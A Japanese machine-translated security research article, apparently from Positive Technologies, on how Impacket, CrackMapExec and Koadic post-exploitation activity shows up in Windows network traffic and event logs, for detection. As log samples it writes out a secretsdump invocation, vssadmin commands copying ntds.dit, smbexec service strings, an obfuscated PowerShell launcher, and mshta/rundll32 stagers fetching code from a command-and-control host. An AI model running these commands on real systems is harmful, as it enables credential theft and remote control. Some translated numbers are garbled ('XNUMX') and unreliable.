Windows インフラストラクチャへの攻撃を検出する方法: ハッカー ツールの研究

企業部門における攻撃の数は年々増加しています。たとえば、 2017 年には、13% 多いユニークなインシデントが記録されました 2016 年よりも、そして 2018 年末よりも - インシデントが 27% 増加前期よりも。 主な作業ツールが Windows オペレーティング システムであるものも含まれます。 2017 年から 2018 年にかけて、APT Dragonfly、APT28、 APT マディウォーター ヨーロッパ、北米、サウジアラビアの政府および軍事組織に対する攻撃を実行した。 このために XNUMX つのツールを使用しました - インパケット, クラックマップ実行 и コアディック。 彼らのソースコードはオープンで、GitHub で入手できます。

これらのツールは最初の侵入ではなく、インフラストラクチャ内で攻撃を展開するために使用されることに注意してください。 攻撃者は、境界を突破した後の攻撃のさまざまな段階でこれらを使用します。 ちなみに、これを検出するのは難しく、多くの場合、テクノロジーの助けを借りてのみ検出されます。 ネットワークトラフィックにおける侵害の痕跡を特定する またはそれを可能にするツール 攻撃者がインフラストラクチャに侵入した後のアクティブなアクションを検出する。 このツールは、ファイルの転送からレジストリとの対話、リモート マシンでのコマンドの実行まで、さまざまな機能を提供します。 私たちは、これらのツールのネットワーク アクティビティを確認するために調査を実施しました。

私たちがする必要があったこと:

• ハッキングツールがどのように機能するかを理解する。 攻撃者が何を悪用する必要があるのか​​、またどのようなテクノロジーを利用できるのかを調べます。
• 攻撃の最初の段階で情報セキュリティツールによって検出されなかったものを見つける。 攻撃者が内部攻撃者であるか、攻撃者がこれまで知られていなかったインフラストラクチャのホールを悪用しているために、偵察フェーズがスキップされる可能性があります。 彼の行動の連鎖全体を復元することが可能になるため、さらなる動きを検出したいという欲求が生まれます。
• 侵入検知ツールからの誤検知を排除する。 偵察のみに基づいて特定の行動が検出された場合、頻繁にエラーが発生する可能性があることを忘れてはなりません。 通常、インフラストラクチャには、一見しただけでは正規の方法と区別できない、情報を取得するための十分な数の方法が存在します。

これらのツールは攻撃者に何を与えるのでしょうか? これが Impacket の場合、攻撃者は境界を突破した後に続く攻撃のさまざまな段階で使用できるモジュールの大規模なライブラリを受け取ります。 Metasploit など、多くのツールは内部で Impacket モジュールを使用します。 リモートコマンド実行用の dcomexec と wmiexec、Impacket から追加されたアカウントをメモリから取得するための Secretsdump があります。 結果として、このようなライブラリーの活性を正しく検出することで、誘導体の検出が確実になります。

作成者が CrackMapExec (または単に CME) について「Powered by Impacket」を書いたのは偶然ではありません。 さらに、CME には、パスワードまたはそのハッシュを取得するための Mimikatz、リモート実行のための Meterpreter または Empire エージェントの実装、およびオンボードの Bloodhound など、一般的なシナリオに対応する既製の機能があります。

私たちが選択した 25 番目のツールは Koadic です。 これはごく最近のもので、2017 年の国際ハッカー会議 DEFCON 3 で発表されましたが、HTTP、Java Script、および Microsoft Visual Basic Sc​​ript (VBS) を介して動作するという非標準的なアプローチが特徴です。 このアプローチは、土地からの生活と呼ばれます。このツールは、Windows に組み込まれている一連の依存関係とライブラリを使用します。 作成者はこれを COM コマンド & コントロール (CXNUMX) と呼んでいます。

衝撃

Impacket の機能は非常に幅広く、AD 内部の偵察や内部 MS SQL サーバーからのデータ収集から、資格情報を取得するためのテクニック (これは SMB リレー攻撃)、およびドメイン コントローラーからのユーザー パスワードのハッシュを含む ntds.dit ファイルの取得まで多岐にわたります。 また、Impacket は、WMI、Windows スケジューラ管理サービス、DCOM、SMB の XNUMX つの異なる方法を使用してコマンドをリモートで実行しますが、そのためには資格情報が必要です。

秘密ダンプ

Secretsdump を見てみましょう。 これは、ユーザー マシンとドメイン コントローラーの両方をターゲットにできるモジュールです。 これはメモリ領域 LSA、SAM、SECURITY、NTDS.dit のコピーを取得するために使用できるため、攻撃のさまざまな段階で確認される可能性があります。 モジュール操作の最初のステップは SMB 経由の認証です。これには、Pass the Hash 攻撃を自動的に実行するためにユーザーのパスワードまたはそのハッシュが必要です。 次に、Service Control Manager (SCM) へのアクセスをオープンし、winreg プロトコル経由でレジストリにアクセスするリクエストが来ます。攻撃者はこれを使用して、対象のブランチのデータを見つけ出し、SMB 経由で結果を取得できます。

図では、 1 では、winreg プロトコルを使用する場合、LSA を持つレジストリ キーを使用してアクセスがどのように取得されるかを確認します。 これを行うには、オペコード 15 - OpenKey を指定して DCERPC コマンドを使用します。

米。 1. winreg プロトコルを使用してレジストリ キーを開く

次に、キーへのアクセスが取得されると、値はオペコード 20 の SaveKey コマンドで保存されます。Impacket はこれを非常に特殊な方法で行います。 値は、.tmp が追加された 8 つのランダムな文字列を名前とするファイルに保存されます。 さらに、このファイルは System32 ディレクトリから SMB 経由でさらにアップロードされます (図 2)。

米。 2. リモートマシンからレジストリキーを取得する仕組み

ネットワーク上のこのようなアクティビティは、winreg プロトコル、特定の名前、コマンド、およびそれらの順序を使用した特定のレジストリ ブランチへのクエリによって検出できることが判明しました。

このモジュールは Windows イベント ログにも痕跡を残すため、検出が容易になります。 たとえば、コマンドを実行した結果、

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Windows Server 2016 ログには、次の主要なイベント シーケンスが表示されます。

1. 4624 - リモート ログオン。
2. 5145 - winreg リモート サービスへのアクセス権を確認します。
3. 5145 - System32 ディレクトリ内のファイル アクセス権をチェックします。 ファイルには上記のランダムな名前が付けられます。
4. 4688 - vssadmin を起動する cmd.exe プロセスを作成します。

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - 次のコマンドを使用してプロセスを作成します。

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - 次のコマンドを使用してプロセスを作成します。

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - 次のコマンドを使用してプロセスを作成します。

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

SMBEXEC

多くのポストエクスプロイトツールと同様に、Impacket にはコマンドをリモートで実行するためのモジュールがあります。 ここでは、リモート マシン上で対話型のコマンド シェルを提供する smbexec に焦点を当てます。 このモジュールでは、パスワードまたはパスワード ハッシュを使用した SMB 経由の認証も必要です。 図では、 図 3 は、このようなツールがどのように機能するかを示す例です。この場合はローカル管理者コンソールです。

米。 3. インタラクティブな smexec コンソール

認証後の smbexec の最初のステップは、OpenSCManagerW コマンド (15) を使用して SCM を開くことです。 このクエリは注目に値します。MachineName フィールドが DUMMY です。

米。 4. サービス コントロール マネージャーを開く要求

次に、CreateServiceW コマンドを使用してサービスを作成します (12)。 smbexec の場合、毎回同じコマンド構築ロジックが見られます。 図では、 5 緑色は変更できないコマンド パラメータを示し、黄色は攻撃者が変更できるものを示します。 実行可能ファイル、そのディレクトリ、および出力ファイルの名前を変更できることは簡単にわかりますが、Impacket モジュールのロジックを妨げずに残りを変更するのは非常に困難です。

米。 5. Service Control Managerを使用してサービスの作成を要求します。

Smbexec は Windows イベント ログにも明らかな痕跡を残します。 ipconfig コマンドを使用した対話型コマンド シェルの Windows Server 2016 ログには、次のキー シーケンスのイベントが記録されます。

1. 4697 — 被害者のマシンへのサービスのインストール:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ポイント 1 の引数を使用して cmd.exe プロセスを作成します。
3. 5145 - C$ ディレクトリ内の __output ファイルへのアクセス権をチェックしています。
4. 4697 — 被害者のマシンへのサービスのインストール。

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ポイント 4 の引数を使用して cmd.exe プロセスを作成します。
6. 5145 - C$ ディレクトリ内の __output ファイルへのアクセス権をチェックしています。

Impacket は攻撃ツール開発の基礎です。 Windows インフラストラクチャのほぼすべてのプロトコルをサポートし、同時に独自の特徴的な機能を備えています。 ここでは、具体的な winreg リクエスト、特徴的なコマンド形式による SCM API の使用、ファイル名形式、および SMB 共有 SYSTEM32 について説明します。

クラックマップエクゼク

CME ツールは主に、攻撃者がネットワーク内に侵入するために実行する必要がある日常的なアクションを自動化するように設計されています。 これにより、有名な Empire エージェントや Meterpreter と連携して作業できるようになります。 コマンドを秘密裏に実行するために、CME はコマンドを難読化できます。 Bloodhound (別の偵察ツール) を使用すると、攻撃者はアクティブなドメイン管理者セッションの検索を自動化できます。

ブラッドハウンド

Bloodhound はスタンドアロン ツールとして、ネットワーク内の高度な偵察を可能にします。 ユーザー、マシン、グループ、セッションに関するデータを収集し、PowerShell スクリプトまたはバイナリ ファイルとして提供されます。 情報の収集には、LDAP または SMB ベースのプロトコルが使用されます。 CME 統合モジュールを使用すると、Bloodhound を被害者のマシンにダウンロードして実行し、実行後に収集されたデータを受け取ることができるため、システム内のアクションが自動化され、目立たなくなります。 Bloodhound グラフィカル シェルは、収集したデータをグラフの形式で表示するため、攻撃者のマシンからドメイン管理者までの最短パスを見つけることができます。

米。 6.ブラッドハウンドインターフェース

被害者のマシンで実行するために、モジュールは ATSVC と SMB を使用してタスクを作成します。 ATSVC は、Windows タスク スケジューラを操作するためのインターフェイスです。 CME は、NetrJobAdd(1) 関数を使用して、ネットワーク上でタスクを作成します。 CME モジュールが送信するものの例を図に示します。 7: これは cmd.exe コマンド呼び出しと、XML 形式の引数形式の難読化されたコードです。

図7。 CME 経由でタスクを作成する

タスクが実行のために送信された後、被害者のマシンは Bloodhound 自体を起動します。これはトラフィックで確認できます。 このモジュールの特徴は、標準グループ、ドメイン内のすべてのマシンとユーザーのリストを取得し、SRVSVC NetSessEnum リクエストを通じてアクティブなユーザー セッションに関する情報を取得する LDAP クエリによって特徴付けられます。

米。 8. SMB 経由でアクティブなセッションのリストを取得する

さらに、監査を有効にして被害者のマシンで Bloodhound を起動すると、ID 4688 (プロセス作成) とプロセス名を持つイベントが発生します。 «C:WindowsSystem32cmd.exe»。 注目すべき点は、コマンドライン引数です。

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts モジュールは、機能と実装の観点から非常に興味深いものです。 WMI を使用すると、WQL クエリ言語を使用してさまざまな Windows オブジェクトからデータを取得できます。これは、基本的にこの CME モジュールが使用するものです。 被害者のマシンにインストールされている保護ツールに関するクエリを AntiSpywareProduct クラスと AntiМirusProduct クラスに生成します。 必要なデータを取得するために、モジュールは rootSecurityCenter2 名前空間に接続し、WQL クエリを生成して応答を受け取ります。 図では、 図 9 は、そのようなリクエストとレスポンスの内容を示しています。 この例では、Windows Defender が見つかりました。

米。 9. enum_avproducts モジュールのネットワーク アクティビティ

多くの場合、WMI 監査 (WMI アクティビティのトレース) が無効になっている場合があります。このイベントでは、WQL クエリに関する有益な情報が見つかります。 ただし、有効にすると、enum_avproducts スクリプトが実行されると、ID 11 のイベントが保存され、リクエストを送信したユーザーの名前と rootSecurityCenter2 名前空間の名前が含まれます。

各 CME モジュールには、特定の WQL クエリや難読化を使用したタスク スケジューラでの特定の種類のタスクの作成、LDAP および SMB での Bloodhound 固有のアクティビティなど、独自のアーティファクトがありました。

コアディック

Koadic の特徴的な機能は、Windows に組み込まれている JavaScript および VBScript インタープリターを使用することです。 この意味で、これは土地を離れて生活するというトレンドに従っています。つまり、外部依存がなく、標準の Windows ツールを使用します。 これは完全なコマンド＆コントロール (CnC) のためのツールであり、感染後にマシンに「インプラント」が取り付けられ、マシンを制御できるようになります。 このようなマシンはコアディック用語で「ゾンビ」と呼ばれます。 被害者側に完全な操作を行うための十分な権限がない場合、Koadic はユーザー アカウント制御バイパス (UAC バイパス) 技術を使用して権限を引き上げる機能を備えています。

米。 10.コアディックシェル

被害者は、Command & Control サーバーとの通信を開始する必要があります。 これを行うには、事前に準備した URI に接続し、ステージャーの 11 つを使用して Koadic の本体を受信する必要があります。 図では、 図 XNUMX は、mshta ステージャーの例を示しています。

米。 11. CnCサーバーとのセッションの初期化

応答変数 WS に基づいて、実行が WScript.Shell を通じて行われ、変数 STAGER、SESSIONKEY、JOBKEY、JOBKEYPATH、EXPIRE に現在のセッションのパラメーターに関する重要な情報が含まれていることがわかります。 これは、CnC サーバーとの HTTP 接続における最初の要求と応答のペアです。 後続のリクエストは、呼び出されたモジュール (インプラント) の機能に直接関係します。 すべての Koadic モジュールは、CnC とのアクティブなセッションでのみ動作します。

ミミカッツ

CME が Bloodhound と連携するのと同じように、Koadic は別個のプログラムとして Mimikatz と連携し、起動する方法が複数あります。 以下は、Mimikatz インプラントをダウンロードするためのリクエストとレスポンスのペアです。

米。 12. ミミカッツをコアディッチに移籍

リクエストの URI 形式がどのように変更されたかを確認できます。 これには、選択したモジュールを担当する csrf 変数の値が含まれています。 彼女の名前には注意を払わないでください。 CSRF が通常とは異なって理解されていることは誰もが知っています。 レスポンスは同じKoadic本体にMimikatz関連のコードを追加したものでした。 かなり分量が多いので、要点を見ていきましょう。 ここには、base64 でエンコードされた Mimikatz ライブラリ、それを挿入するシリアル化された .NET クラス、および Mimikatz を起動するための引数があります。 実行結果は平文でネットワーク上に送信されます。

米。 13. リモート マシン上で Mimikatz を実行した結果

Exec_cmd

Koadic には、コマンドをリモートで実行できるモジュールもあります。 ここでは、同じ URI 生成方法と、おなじみの sid 変数と csrf 変数を見ていきます。 exec_cmd モジュールの場合、シェル コマンドを実行できるコードが本体に追加されます。 以下に、CnC サーバーの HTTP 応答に含まれるコードを示します。

米。 14. インプラントコード exec_cmd

コードの実行には、おなじみの WS 属性を持つ GAWTUUGCFI 変数が必要です。 その助けを借りて、インプラントはシェルを呼び出し、出力データ ストリームを返すshell.execと返さないshell.runというXNUMXつのコード分岐を処理します。

Koadic は一般的なツールではありませんが、正規のトラフィックで検出できる独自のアーティファクトを持っています。

• HTTPリクエストの特別な形式、
• winHttpRequests API を使用して、
• ActiveXObject 経由で WScript.Shell オブジェクトを作成します。
• 大きな実行可能本体。

初期接続はステージャーによって開始されるため、Windows イベントを通じてそのアクティビティを検出できます。 mshta の場合、これはイベント 4688 であり、start 属性を持つプロセスの作成を示します。

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Koadic の実行中、それを完全に特徴づける属性を持つ他の 4688 イベントを確認できます。

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

所見

土地を離れて生計を立てるというトレンドが犯罪者の間で人気を集めています。 彼らは、ニーズに応じて Windows に組み込まれているツールとメカニズムを使用します。 この原則に従った人気ツール Koadic、CrackMapExec、Impacket が APT レポートに登場することが増えています。 これらのツールの GitHub 上のフォークの数も増えており、新しいフォークも登場しています (現在、すでに約 XNUMX 個あります)。 このトレンドはそのシンプルさから人気を集めています。攻撃者はサードパーティのツールを必要とせず、すでに被害者のマシン上に存在し、セキュリティ対策を回避するのに役立ちます。 私たちはネットワーク通信の研究に重点を置いています。上記の各ツールはネットワーク トラフィックに独自の痕跡を残します。 それらを詳細に研究したことで、私たちの製品を教えることができました PT ネットワーク攻撃の発見 それは最終的に、それらが関与する一連のサイバーインシデント全体を調査するのに役立ちます。

著者:

• Anton Tyurin 氏、Positive Technologies、PT Expert Security Center、エキスパート サービス部門責任者
• Egor Podmokov 氏、Positive Technologies、PT エキスパート セキュリティ センター、エキスパート

出所： habr.com